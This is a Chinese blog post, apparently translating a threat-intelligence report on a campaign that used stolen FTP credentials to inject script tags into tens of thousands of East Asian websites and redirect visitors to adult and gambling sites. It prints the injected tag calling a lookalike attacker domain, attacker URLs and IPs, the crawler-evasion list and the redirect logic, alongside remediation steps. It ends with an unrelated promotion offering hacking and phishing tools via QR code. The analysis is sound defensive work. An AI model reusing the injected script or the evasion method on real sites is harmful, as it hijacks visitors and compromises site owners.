溯源分析 | 黑客横扫亚多家云平台做流量劫持

自 2022 年 9 月上旬以来,数万个针对东亚用户的网站遭到黑客攻击,将数十万用户重定向到成人主题内容。

长话短说

在过去的几个月里,我们一直在调查利用通过未知威胁向量获得的合法 FTP 凭据的大规模网络操作。在许多情况下,这些是高度安全的自动生成的 FTP 凭据,黑客以某种方式获取并利用这些凭据进行网站劫持。

执行简介

自 2022 年 9 月上旬以来,一个未知的黑客已成功入侵数万个主要针对东亚用户的网站,将数十万用户重定向到成人主题内容。在每种情况下,黑客都将恶意代码注入到面向消费者的网页中,这些网页旨在收集有关访问者环境的信息,并偶尔将他们重定向到这些其他网站,具体取决于随机机会和用户所在的国家/地区.

被入侵的网站包括许多小公司网站和一些由跨国公司网站。它们在技术栈和托管服务方面各不相同,因此很难查明该黑客可能滥用的任何特定漏洞、配置错误或泄露凭据的来源。在一些情况下,包括我们为调查此活动而设置的蜜罐,黑客使用他们之前以某种方式获得的合法 FTP凭据连接到目标 Web服务器。

虽然我们无法确定这个黑客如何获得对受影响的 Web 服务器的初始访问权限,或者他们从哪里获取被盗凭据,但我们决定无论如何都要公布我们的调查结果,以便让更多人意识到这一持续不断的问题活动。鉴于目标网站的性质,我们认为黑客的动机很可能是经济动机,也许他们只想增加来自特定国家/地区的这些网站的流量,仅此而已。然而,对被入侵网站及其用户体验的影响等同于污染,并且该黑客利用任何弱点来获得对这些网站的初始访问权都可能被其他黑客利用来造成更大的伤害。

如果您通过 FTP维护您的网站,我们建议使用具有复杂用户名和密码组合的 FTPS或 SFTP。如果您在您的环境中发现任何与此活动相关的 IOC,您应该更换您的凭据,从可信来源重新安装软件,并将受损资产恢复到以前的干净版本。

请看下图,涉及Azure云,亚马逊云,阿里云和cloudflare

介绍

2022 年 10 月上旬,作为我们与客户合作调查其云环境面临威胁的一部分,我们了解到几个在东亚地区托管的被入侵的 Azure Web应用程序将用户重定向到成人网站。在上述每一种情况下,用于管理 Web应用程序的 FTP服务都被未知黑客使用合法凭据访问(长而复杂的密码,不太可能作为暴力字典攻击的一部分包含在内)。黑客修改了现有网页并添加了一行 HTML代码,其形式为引用远程 JavaScript脚本的脚本标签。在多个案例中,根据对相关 FTP 日志的分析,黑客从静态 IP 地址 172.81.104.64 连接到这些 FTP 节点。

随着我们进一步调查,我们发现这些看似孤立的案例实际上是一组更大的活动的一部分,这些活动已成功入侵数千个网站,其中包括几个由大型跨国公司运营并针对东亚用户的网站。根据来自publicwwwSimiliarWeb的数据,我们建议在撰写本文时保守估计至少有 10,000 个受损网站(不包括子域),每月总共重定向数十万用户。这些网站在其底层技术和托管服务方面非常多样化,实际上只有一小部分是 Azure Web应用程序。

鉴于重定向的方法和目标网站的性质,我们最初假设这是一个污染案例,但我们后来考虑了目标可能是广告欺诈、 SEO 操纵或可能只是将无机流量驱动到的可能性这些网站。我们没有观察到任何网络钓鱼、网络浏览或恶意软件感染的迹象,也尚未确定任何可以揭示黑客确切动机的证据。

我们得出的结论是,这项活动很可能始于 2022 年 9 月上旬(根据域名注册日期和受害者报告),涉及不断入侵网络服务器,收集有关其访问者的信息,有时只是将他们重定向到其他包含成人网站或赌博网站。

技术细节

黑客破坏的网站修改为包含多个 JavaScript标记之一(尽管在某些情况下恶意 JavaScript被直接注入服务器上的现有文件,如下所述)。考虑到静态注入内容和黑客使用 FTP直接在服务器上修改文件,这似乎排除了恶意广告作为攻击向量的可能性。

注入的脚本标签导致访问者下载并执行托管在黑客控制的服务器上的 JavaScript脚本,其 URL看起来类似于合法服务(例如tpc.googlesyndication.wiki伪装成合法服务tpc.googlesyndication.com):

<script type="text/javascript" src="https://tpc.googlesyndication.wiki/sodar/sodar2.js"></script>

这些修改似乎是自动进行的,因为我们已经确定了同一个网站包含多个标签的情况,这表明它不止一次被破坏(这对我们的研究很有用,因为它让我们能够发现新的变体)。此外,JavaScript标记几乎总是添加到HTML页面<head>部分的末尾或作为 JavaScript文件中的最后一行。我们还目睹了此过程中的错误,例如将标签添加到二进制文件(如视频)的末尾(。

我们还发现了一个GitHub项目似乎也受到了类似的破坏,其中一次提交将恶意 JavaScript标签的两个变体添加到各个页面。这可能意味着黑客一直在试图非法访问代码存储库,以感染任何相关网站。

恶意主机均以 Cloudflare为前端并进行地理位置限制,限制从东亚某些国家/地区连接的用户执行 JavaScript脚本。此外,该脚本使用一种常见的网络伪装技术,将访问者的用户代理和引荐来源网址与已知网络爬虫和搜索引擎(如 GoogleBot 或百度)列表相匹配,并忽略此类请求。然而,这并不能阻止这些网络爬虫对被入侵网站中添加的恶意代码行进行索引,这使我们更容易识别它们。

到目前为止,我们已经发现了许多评估为与此活动相关的服务器,每个服务器都托管上述 JavaScript脚本的变体,同时伪装成合法的 URL(通常通过更改顶级域):

恶意网址合法网址
tpc.googlesyndication.wiki/sodar/sodar2.jstpc.googlesyndication.com/sodar/sodar2.js
beacon-v2.helpscout.help/static/js/vendor.06c7227b.jsbeacon-v2.helpscout.net/static/js/vendor.06c7227b.js
cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.jscdn.jsdelivr.net/npm/jquery/dist/jquery.min.js
minjs.us/static/js/min.js*/static/js/min.js
cdn-go.net/vasdev/web_webpersistance_v2/v1.8.2/flog.core.min.jscdn-go.cn/vasdev/web_webpersistance_v2/v1.8.2/flog.core.min.js
a.msstatic.net/main3/common/assets/template/head/ad.tmpl_a9b7.jsa.msstatic.com/huya/main3/*

虽然我们不能完全确定这些都是同一个活动集群的所有部分并由同一个黑客操作,但 JavaScript脚本的结构都相似,使用类似的混淆技术,并包含唯一可识别的字符串(明文或混淆),例如作为要忽略的爬虫列表(请参阅下一节)。此外,其中一些服务器 似乎正在运行 NGINX,并且一些域名是通过 PorkBun注册的。域minjs.us和域metamarket.quest的独特之处在于它们的原始 IP地址已在历史 DNS 记录中公开(193.109.120.45159.69.123.158,分别基于私有被动 DNS 数据,但可公开验证)。后者一直活跃到 2023 年 2 月下旬,并且曾为googlesyndication.wiki提供过证书,证明了这些域之间的附加链接。

重定向脚本

JavaScript脚本的重定向逻辑显然会检查一组特定条件(随着时间的推移而改变),并且只有在满足这些条件的情况下才会将访问者重定向到目标网站。在最新的变体中(截至 2023 年 2 月),其中一些条件如下:

  1. 每个脚本变体都包含一个probability设置为 0 到 1 之间数字的字段。执行脚本时,会计算一个 0 到 1 之间的随机数,如果计算结果小于该值,则会在用户probability的机器设置为 24 小时后过期,然后用户将被重定向到该srcAddress字段中列出的目标网站。

  2. 如果用户的机器上已经设置了 cookie,那么当他们下次访问任何受相同变体破坏的网站时,他们会自动重定向到srcAddress字段中列出的目标网站,同时忽略该probability字段值。不同的脚本变体有时会为其 cookie使用不同的名称(观察到的示例包括qwertvybdstatics)。

  3. 有趣的是,如果用户使用的是 Android浏览器并且在脚本中启用了标志config.androidApk,那么不会将用户重定向到srcAddress字段中列出的网站,而是重定向到downloadSrc字段中列出的资源。在我们分析的样本中,这些要么googleplay.com/chrome.apk是要么google.com/google.apk(取决于变体)。请注意,这些资源实际上都不存在,而且我们从未见过启用config.anrdoidApk的变体。这可能表明这些只是占位符,它们的功能尚未完全实现。

  4. 如上所述,如果用户代理是已知网络爬虫的,或者引用者是已知搜索引擎的,则不会重定向用户(此功能分别在 isSpidersearchEngine函数中实现)。以下是脚本中包含的爬虫列表:

bot|googlebot|crawler|spider|robot|crawling|Bytespider|Googlebot|Baiduspider|MSN Bot\/Bingbot|Yandex Bot|Soso Spider|Sosospider|Sogou Spider|360Spider|Yahoo! Slurp China|Yahoo!|YoudaoBot|YodaoBot|Sogou News Spider|msnbot|msnbot-media|bingbot|YisouSpider|ia_archiver|EasouSpider|JikeSpider|EtaoSpider|SemrushBot

我们推测probability字段的目的可能是为了负载平衡(以防止黑客的基础设施或目标网站过载),或者可能出于操作安全原因:因为重定向行为看起来不一致(与上述地理位置限制配合),它可能用户或网站管理员更难识别问题并查明原因(正如用户在公共论坛上争论特定网站是否被感染所证明的那样)。从理论上讲,这可能会增加 Web 服务器在较长时间内保持受损的机会。

在过去的版本中,JavaScript脚本还收集了某些信息,这些信息显然是为了对访问者的浏览器进行指纹识别(userAgent,host,referer,language,url,title,charset,OS,browser,resolution,typeRefererredirectUrl)。此信息以 Base64编码并以 JSON 格式汇总(格式为{"mydata":$data})。该脚本将使用 POST请求将 JSON上传到黑客控制的主机 (/top/record/addRecord) 上的 API节点。然后服务器将响应包含进一步指令的 JSON(格式为{"code":$code,"msg":$message,"data":$data}). 但是,在当前的一组脚本中并没有出现这种行为。从2022年12月开始,该脚本不再通过POST向服务器上传任何数据,并且删除了一些相关功能(较新的变体不再包括detectOSdetectBrowsergetCurrentDategetLanguage、或isPC函数)。

除了添加或删除功能外,黑客还对恶意脚本进行了额外修改,其中一些似乎是为了响应检测。例如,托管在的脚本metamarket.quest经历了多次迭代,最初使用一种混淆方法,重定向概率为 30%(截至 2022 年 9 月),但后来切换到不同的混淆方法,并将概率降低到 10%(截至 2022 年 12 月)。有趣的是,目前托管的脚本的helpscout.help概率设置为 0%,这意味着目前没有用户被重定向到被入侵的网站。

值得注意的是,在此期间,与此活动相关的几个样本被上传到 VirusTotal,并被 THOR APT Scanner YARA规则检测到,随后(2022 年 11 月下旬)威胁者改变了他们的 MO:在某些情况下,除了将 JavaScript标签添加到被入侵服务器上的现有文件后,他们开始直接将混淆的 JavaScript代码注入某些文件(我们在蜜罐上也观察到了这种行为)。我们评估这可能是因为某些 THOR APT YARA规则不扫描大于 100KB 的样本,但这很可能是巧合。

目的地网站

最初将用户重定向到的网站包括alivod1.com22332299.comalibb1.xyzalibb2.xyz(阿里 BB / 阿里巴巴是“阿里巴巴”的中文简写)。重定向最初是直接执行的,但截至 2023 年 2 月,用户通过中间服务器重定向,然后将他们转发到似乎是动态生成的域名,例如qs70qw11az.com显示“Alibbfb”的品牌和各种赌博网站的广告,有时还会显示弹出窗口,提及使用“alibb”命名方案的网站。赌博网站会建议访问者下载一个 APK文件来安装一个 Android应用程序。

中间服务器

如上所述,重定向过程随时间发生了变化。虽然被入侵网站的访问者最初是直接重定向的,但截至 2023 年 2 月,用户现在首先通过四个已知中间服务器之一重定向,这些中间服务器的 URL伪装成合法网站:

恶意网址合法网址
s3a.pstatp.org/toutiao/push.jss3a.pstatp.com/toutiao/push.js
stat.51sdk.org/(例如,stat.51sdk.org/b8nb3Ww5CtxpZis2)stat.51sdk.com (?)
tpc.cdn-linkedin.info/js/vendor.5b3ca61.js*-cdn.linkedin.com(例如,mobile-cdn.linkedin.com)
widget-v4.tidiochat.net/1_131_0/static/js/chunk-WidgetIframe-.jswidget-v4.tidiochat.com/1_137_1/static/js/*

然后,用户将被重定向到看似动态生成或随机命名的域,包括qs70qw11az.com,rsoy6a1w7p.com,3h1yt68lxk.comg7h69h29cx.com。在撰写本文时,根据 SimilarWeb,最后一家在中国最受欢迎的网站排名第 2943,与美国的nespresso.com (排名第 2737)相当。

根据SimiliarWeb的数据,上述中间服务器每月处理数十万访问者——绝大多数来自东亚——并且一些活动在不同时期比其他活动更活跃,这可能与上述每个活动的“概率”字段:

受害者学

当我们试图确定被入侵网站之间的共同点时,我们发现绝大多数(但不是全部)满足以下标准:

  1. 要么在中国托管,要么在其他地方托管,但针对的是中国观众。

  2. 要么托管在具有开放 FTP端口 (21) 的服务器上,要么通过单独的 FTP节点部署。

我们已经确定了几个实例,其中被入侵网站的管理员注意到了入侵并在某些情况下删除了恶意重定向, 但它在不久之后又会重新出现。此外,我们发现其中一些被入侵网站的访问者报告说他们注意到他们被重定向到另一个网站(。此外,我们还发现了一台服务器, 显然是为了在几周内监控许多网站的感染迹象,这清楚地表明其他人也一直在调查这一活动。过去几个月在VirusTotalWeibu Threatbookurlscan.io上扫描的大量相关样本也支持这一点。

我们已经阅读了一些声明,称此活动是通过利用前端开发软件百度 UEditor中的已知漏洞或宝塔(BT Panel)中的未知漏洞来推进的. 但是,我们认为这些本身并不能作为充分的解释。尽管如此,黑客很可能有多种方法可供使用,因此这些理论在某些特定情况或活动中可能适用。

蜜罐调查

在我们的调查过程中,我们设置了一个带有中国 IP 地址的蜜罐,上传了几个虚拟文件,并将其配置为允许任何 FTP 连接。从那以后,我们观察到黑客多次从上述 IP 地址 ( 172.81.104.64) 连接到它。我们没有看到黑客利用我们机器上的任何漏洞的迹象——相反,他们使用了与另一个不相关服务器关联的用户名和密码组合(这次尝试成功是因为我们将蜜罐配置为接受任何 FTP 连接)。根据历史 DNS 记录,这台服务器似乎之前托管在我们蜜罐的当前 IP 地址上。

一旦获得访问权限,他们便开始修改文件来包含恶意 JavaScript标记,并在后来的入侵中将脚本直接注入现有页面(如上所述)。这可能意味着在过去黑客获取了这台服务器的凭据并入侵了它,但我们无法证实这一点。还观察到他们使用看似来自普通暴力字典的通用用户名和密码组合连接到另一个蜜罐。

建议

如果您通过 FTP维护您的网站,我们建议使用具有强大用户名和密码组合的 FTPS或 SFTP。如果您在 Web服务器中发现任何妥协迹象(请参阅附录 B),我们建议您采取以下措施:

  1. 更换您用于维护受影响网站的任何凭据(例如 FTP和 Git密码)。

  2. 如果您通过 FTP维护您的网站,请切换到 FTPS或 SFTP

  3. 通过搜索已知的恶意域名(参见附录 B),识别网站各种资产中所有恶意 JavaScript标签/代码的实例。

  4. 从受信任的映像重新部署服务器,从受信任的来源重新安装软件,并修补到最新版本。

  5. 将受损资产恢复到不包含恶意 JavaScript标签/代码的先前干净版本,或手动删除标签/代码的所有实例。

开放式问题

  1. 黑客如何获得对目标 Web 服务器的初始访问权限?(即,他们首先如何为目标 Web 服务器获取合法的 FTP 凭据?)

  2. 作为此活动的一部分,用户被重定向到哪些其他网站?

  3. 为什么服务器地理限制在东亚?

  4. 拥有“probability”字段的目的是什么?(而不是重定向所有访问者)

  5. 是否存在发生重定向以外的行为的任何条件?(例如,下载额外的有效载荷)

概括

我们仍然不确定黑客是如何获得这么多网站的初始访问权限的,而且我们还没有确定受影响的服务器之间除了使用 FTP 之外的任何重要共同点。尽管鉴于攻击的复杂程度明显较低,黑客不太可能使用 0day 漏洞,但我们不能将其排除在外。也有可能我们只是忽略了一些共性,例如特定服务器端软件的错误配置或易受攻击的版本,或者可能是用于管理受影响网站的工具。黑客还可能利用密码窃取者的数据或利用泄露的凭据,如GoDaddy泄露, 尽管这不能完全解释服务器在密码更换后如何被重新感染。

尽管我们对这种威胁活动知之甚少,但我们还是决定公布我们的发现,以提高人们对这种持续活动的认识,并希望安全社区中的其他人能够识别初始访问向量。

鉴于目标网站的性质,我们认为黑客的动机很可能是经济动机,也许他们只想增加来自特定国家/地区的这些网站的流量,仅此而已。然而,对被入侵网站及其用户体验的影响等同于污染,并且该黑客利用任何弱点来获得对这些网站的初始访问权都可能被其他黑客利用来造成更大的伤害。与此同时,我们与 Cloudflare分享了我们的发现,并要求他们阻止这些重定向。

题外话

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

  • 2023届全国高校毕业生预计达到1158万人,就业形势严峻;
  • 国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。 

网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

  • 24
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值